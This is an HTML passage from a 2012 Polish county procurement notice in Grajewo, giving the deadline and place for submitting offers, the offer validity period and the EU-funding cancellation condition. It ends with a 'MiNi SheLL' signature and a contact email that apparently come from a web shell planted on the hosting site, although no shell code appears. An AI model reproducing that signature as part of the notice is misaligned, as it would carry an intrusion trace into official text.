<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Grajewie
ul. Strażacka 6 B
19-200 Grajewo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2012 godzina 09:00, miejsce: Starostwo Powiatowe w Grajewie, ul. Strażacka 6 B, pok. Nr 18..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com